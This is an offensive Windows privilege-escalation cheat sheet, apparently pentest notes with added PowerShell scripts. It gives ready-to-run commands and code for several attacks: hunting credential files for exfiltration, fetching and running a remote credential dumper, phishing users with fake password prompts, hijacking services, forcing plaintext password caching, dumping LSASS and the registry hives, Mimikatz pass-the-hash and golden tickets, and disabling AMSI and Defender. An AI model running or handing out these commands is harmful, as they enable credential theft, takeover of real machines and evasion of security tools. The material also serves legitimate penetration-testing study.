Privesc
> Local Enum
net localgroup Users
net localgroup Administrators
whoami
whoami /all
net users
net accounts
dir env:   (PowerShell: enumerate environment variables; cmd equivalent: set)
wmic bios
wmic volume
> network
ipconfig /all
route print
arp -a
netstat -ano
net share
net use
wmic netuse list full
netsh firewall show state
netsh firewall show config
(netsh firewall is deprecated; on Windows 7 / 2008 R2 and later use: netsh advfirewall show allprofiles)
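Added example (PowerShell, not from the original notes): a quick triage of what the current token can do, built from the facts the commands above expose (group membership, elevation, whoami /priv). It assumes only a PowerShell 5.1+ shell; the list of "interesting" privileges is my own selection, not exhaustive.

```powershell
# Added example, not part of the original notes. Summarises the token facts that
# decide the next privesc step: admin group membership vs. actual elevation (UAC
# split token), and which privileges from `whoami /priv` are worth abusing.
function Get-TokenTriage {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $pr = New-Object Security.Principal.WindowsPrincipal($id)

    # S-1-5-32-544 is BUILTIN\Administrators; checking by SID works on localized systems
    $adminSid   = 'S-1-5-32-544'
    $inAdmins   = [bool]($id.Groups | Where-Object { $_.Value -eq $adminSid })
    $isElevated = $pr.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # Privileges commonly abused to reach SYSTEM (selection is an assumption, not exhaustive)
    $interesting = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
                   'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege',
                   'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege'
    # whoami /priv /fo csv yields the columns "Privilege Name","Description","State"
    $privs = whoami /priv /fo csv | ConvertFrom-Csv |
             Where-Object { $interesting -contains $_.'Privilege Name' }

    [pscustomobject]@{
        User         = $id.Name
        InAdminGroup = $inAdmins
        Elevated     = $isElevated
        # admin account running at medium integrity: UAC bypass / runas territory
        UacFiltered  = ($inAdmins -and -not $isElevated)
        # "Disabled" privileges are still in the token and can be enabled with AdjustTokenPrivileges
        Privileges   = ($privs | ForEach-Object { "$($_.'Privilege Name')=$($_.State)" }) -join ', '
    }
}

Get-TokenTriage | Format-List
```

If InAdminGroup is true but Elevated is false, the account is an administrator whose shell runs with the UAC-filtered token; the next step is a UAC bypass or a fresh elevated logon rather than a kernel or service exploit.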
cmd /c "dir /b /a /s c:\ > C:\Users\dir.txt"
then we can:
type dir.txt | findstr /i passw
type dir.txt | findstr /i ssh
type dir.txt | findstr /i kdbx   (KeePass database files)
type dir.txt | findstr /i vnc
other files:
unattend.xml or Unattended.xml
sysprep.inf or sysprep.xml
web.config
.bak, .log, .cnf, .conf, .ini, .xml, .txt, .gpg, .pgp, id_rsa, id_dsa, .ovpn, .rdp, vnc, ssh
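Added example (PowerShell, not from the original notes): walks the filesystem once, like the dir /b /a /s listing above, reports files matching the names and extensions listed, and greps the text-like ones for the keywords from the findstr lines. $root and $out are placeholders; the 5 MB cap and the set of extensions treated as text are my own choices.

```powershell
# Added example, not part of the original notes. One filesystem walk that combines
# the dir /b /a /s + findstr steps above: match on name/extension, then grep the
# small text files for keywords. $root and $out are placeholders.
$root = 'C:\'
$out  = 'C:\Users\Public\loot.csv'

$names = 'unattend.xml', 'unattended.xml', 'sysprep.inf', 'sysprep.xml', 'web.config',
         'id_rsa', 'id_dsa'
$exts  = '.bak', '.log', '.cnf', '.conf', '.ini', '.xml', '.txt', '.gpg', '.pgp',
         '.ovpn', '.rdp', '.kdbx'
# extensions that are safe to open as text and grep (assumption)
$textExts = '.bak', '.log', '.cnf', '.conf', '.ini', '.xml', '.txt', '.config', '.ovpn', '.rdp'
$keywords = 'passw', 'pwd', 'ssh', 'vnc', 'kdbx'

# -Force includes hidden/system files; SilentlyContinue skips directories we cannot read
$hits = Get-ChildItem -Path $root -Recurse -Force -File -ErrorAction SilentlyContinue |
    Where-Object {
        $n = $_.Name.ToLower(); $e = $_.Extension.ToLower()
        ($names -contains $n) -or ($exts -contains $e) -or ($n -match 'vnc|ssh|passw')
    } |
    ForEach-Object {
        $kw = $null
        if ($_.Length -lt 5MB -and $textExts -contains $_.Extension.ToLower()) {
            # -List stops at the first match per file; .Pattern tells us which keyword hit
            $m = Select-String -Path $_.FullName -Pattern $keywords -SimpleMatch -List -ErrorAction SilentlyContinue
            if ($m) { $kw = $m.Pattern }
        }
        [pscustomobject]@{ Path = $_.FullName; KB = [int]($_.Length / 1KB)
                           Modified = $_.LastWriteTime; Keyword = $kw }
    }

# keyword hits first, then everything else; the CSV is for offline review
$hits | Sort-Object { $null -eq $_.Keyword }, Path | Export-Csv -NoTypeInformation $out
$hits | Where-Object Keyword | Format-Table -AutoSize
```

Binary formats (.kdbx, .gpg, .pgp, key files) are reported by name only; they are for exfiltration and offline cracking, not grepping.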
> credential manager
cmdkey /list
runas /savecred /user:<user> cmd.exe
dump credentials:
iex (New-Object System.Net.WebClient).DownloadString("<link>");Enum-Creds or Get-VaultCredential
- Prompt the user logged on to the machine for their password (phishing attempt: a fake credential dialog), then read the plaintext from the returned object:
$cred =$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);$cred.getnetworkcredential().password
$cred =$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\admin',[Environment]::UserDomainName);$cred.getnetworkcredential().password
SessionGopher:
find saved sessions of Putty, WinSCP, SuperPutty, FileZilla, RDP
Common Vulnerabilities
- unquoted service path containing spaces
- weak service permissions - accesschk.exe -accepteula -uwcqv <user> *   (Sysinternals; lists services <user> can write to)
→ sc config <service> binPath= "<exe file>"   then restart the service (net stop / net start <service>)
- PowerUp (PowerSploit): Invoke-AllChecks
- JAWS
- Windows Exploit Suggester
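Added example (PowerShell, not from the original notes): covers the two manual checks above in one pass, unquoted service paths with spaces (where could we plant an EXE?) and service binaries whose ACL lets the current user overwrite them. Service configuration permissions (what accesschk -c reports and sc config abuses) are not checked here. The helper names and the ACL heuristic are my own.

```powershell
# Added example, not part of the original notes. Finds services vulnerable to the
# two checks above: unquoted binary paths with spaces, and binaries the current
# user can write. Helper names are assumptions; nothing here is from the notes.

function Test-DirWritable([string]$Dir) {
    # Probe by creating a file: honours inherited ACLs, deny ACEs and the real token
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item $probe -Force; $true }
    catch { $false }
}

function Test-FileAclWritable([string]$File) {
    # A running service's binary cannot be opened for write (image is mapped), so read the ACL.
    # Caveat: a UAC-filtered admin token still lists Administrators in Groups (deny-only).
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $acl  = Get-Acl -LiteralPath $File -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $rules = $acl.GetAccessRules($true, $true, [Security.Principal.SecurityIdentifier]) |
        Where-Object { $sids -contains $_.IdentityReference.Value -and
                       ([int]$_.FileSystemRights -band 2) -ne 0 }   # 2 = WriteData (CreateFiles)
    if ($rules | Where-Object AccessControlType -eq 'Deny') { return $false }
    return [bool]($rules | Where-Object AccessControlType -eq 'Allow')
}

function Find-VulnServices {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        # the executable is everything up to and including ".exe"; the rest are arguments
        if ($svc.PathName -notmatch '^\s*"?(?<exe>[^"]*?\.exe)') { return }
        $exe    = $Matches['exe']
        $quoted = $svc.PathName.TrimStart() -match '^"'

        $findings = @()
        if ((Test-Path -LiteralPath $exe) -and (Test-FileAclWritable $exe)) {
            $findings += "binary writable: $exe"
        }
        if (-not $quoted -and $exe -match ' ') {
            # Windows tries C:\Program.exe, C:\Program Files\Some.exe, ... before the real path
            $parts = $exe -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path $candidate -Parent
                if ((Test-Path -LiteralPath $dir) -and (Test-DirWritable $dir)) {
                    $findings += "unquoted path, plant $candidate"
                }
            }
        }
        if ($findings) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                               StartMode = $svc.StartMode; Finding = $findings -join '; ' }
        }
    }
}

Find-VulnServices | Format-Table -AutoSize
```

A finding only pays off if the service runs as LocalSystem (RunsAs) and can be restarted by you or by a reboot (StartMode Auto), so check both columns before planting anything.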
LSASS
Set the value 'UseLogonCredential' to 1 so WDigest keeps plaintext passwords in LSASS (only for logons that happen after the change):
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rundll32.exe user32.dll,LockWorkStation   (lock the session so the user logs in again and the password gets cached)
extract lsass:
1. task manager > lsass.exe > create dump file > save the dump
2. procdump:
a) -ma = write a full memory dump
b) -r = dump a clone (reflection) of the process instead of touching lsass directly
c) .\procdump64 -accepteula -r -ma lsass.exe lsass
3. comsvcs.dll : rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass PID> lsass_comsvcs.dmp full   (dll,entrypoint must be separated by a comma)
4. Out-Minidump: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
a) . .\Out-Minidump.ps1
b) Get-Process lsass | Out-Minidump
REGISTRY
requires admin priv
extract the registry hives (SAM, SECURITY, SYSTEM):
1. reg save hklm\sam .\sam
2. reg save hklm\security .\security
3. reg save hklm\system .\system
4. python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam -security security -system system LOCAL
   (SYSTEM holds the boot key needed to decrypt the others; SECURITY adds LSA secrets and cached domain logons)
Mimikatz
privilege::debug               # obtain SeDebugPrivilege (needed to read LSASS)
token::elevate                 # impersonate a token - SYSTEM or DA (Domain Admin)
sekurlsa::logonpasswords       # extract credentials from LSASS
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe   # pass-the-hash: spawn a process whose session carries the hash
lsadump::sam                   # decrypt hashes from the SAM (registry)
kerberos::ptt <ticket.kirbi>   # pass-the-ticket: inject a ticket into the current session
kerberos::golden               # forge Golden (krbtgt) / Silver (service) tickets
lsadump::lsa /patch or /inject # dump hashes via LSA (patches samsrv.dll / injects into LSASS)
example:
mimikatz.exe "privilege::debug" "sekurlsa::minidump <dump file>" "sekurlsa::logonpasswords" exit
Invoke-Mimikatz
Variations:
AMSI2
AMSITrigger - finds which strings in a script trigger AMSI, so they can be changed before use
requires admin priv
disable Defender real-time monitoring (fails when Tamper Protection is on, and the change itself is logged):
Set-MpPreference -DisableRealtimeMonitoring $true